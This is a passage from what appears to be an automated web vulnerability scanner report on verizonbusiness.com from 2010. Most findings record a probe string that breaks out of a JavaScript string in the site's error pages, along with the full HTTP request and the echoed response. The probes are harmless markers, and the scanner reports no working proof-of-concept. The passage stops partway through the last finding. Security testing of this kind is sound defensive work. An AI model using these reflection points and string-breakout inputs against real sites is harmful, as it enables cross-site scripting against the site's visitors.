1.400. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee087"%3b963730466a1 was submitted in the REST URL parameter 1. This input was echoed as ee087";963730466a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutee087"%3b963730466a1/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40764
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboutee087";963730466a1/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES


...[SNIP]...

1.401. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5922e"%3b3bdc27de435 was submitted in the REST URL parameter 2. This input was echoed as 5922e";3bdc27de435 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news5922e"%3b3bdc27de435/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:49 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47225
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news5922e";3bdc27de435/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACT
...[SNIP]...

1.402. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db822'%3bf5c5bc32358 was submitted in the REST URL parameter 2. This input was echoed as db822';f5c5bc32358 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsdb822'%3bf5c5bc32358/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:01 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=UTF-8
Content-Length: 47225
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/newsdb822';f5c5bc32358/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.403. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20b5f'%3bf57f11cbcd was submitted in the REST URL parameter 3. This input was echoed as 20b5f';f57f11cbcd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/20b5f'%3bf57f11cbcd HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:46 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Date: Wed, 17 Nov 2010 00:51:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/about/news/20b5f';f57f11cbcd'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.404. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad1b4"%3bca9f7257cc was submitted in the REST URL parameter 3. This input was echoed as ad1b4";ca9f7257cc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/ad1b4"%3bca9f7257cc HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:32 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49709
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/ad1b4";ca9f7257cc";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.405. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccdab"%3bd652d54a16a was submitted in the REST URL parameter 1. This input was echoed as ccdab";d652d54a16a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutccdab"%3bd652d54a16a/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:49:26 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40826
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboutccdab";d652d54a16a/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGO
...[SNIP]...

1.406. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99787'%3b1d90ba84956 was submitted in the REST URL parameter 1. This input was echoed as 99787';1d90ba84956 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about99787'%3b1d90ba84956/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40828
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about99787';1d90ba84956/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
v
...[SNIP]...

1.407. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16631'%3b7a0a23a0ffe was submitted in the REST URL parameter 2. This input was echoed as 16631';7a0a23a0ffe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news16631'%3b7a0a23a0ffe/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:10 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47289
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/about/news16631';7a0a23a0ffe/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=
...[SNIP]...

1.408. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 867c1"%3b91184c7a196 was submitted in the REST URL parameter 2. This input was echoed as 867c1";91184c7a196 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news867c1"%3b91184c7a196/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:50 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=UTF-8
Content-Length: 47287
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news867c1";91184c7a196/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

/
...[SNIP]...

1.409. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29ddc'%3bee89dceb24b was submitted in the REST URL parameter 3. This input was echoed as 29ddc';ee89dceb24b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/29ddc'%3bee89dceb24b HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:04 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/news/29ddc';ee89dceb24b'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.410. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 941dc"%3b76efc0f0267 was submitted in the REST URL parameter 3. This input was echoed as 941dc";76efc0f0267 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/941dc"%3b76efc0f0267 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:26 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49713
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/941dc";76efc0f0267";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.411. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b651'%3bc37bef9bb91 was submitted in the REST URL parameter 1. This input was echoed as 5b651';c37bef9bb91 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about5b651'%3bc37bef9bb91/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml HTTP/1.1
Host: www.verizonbusiness.com
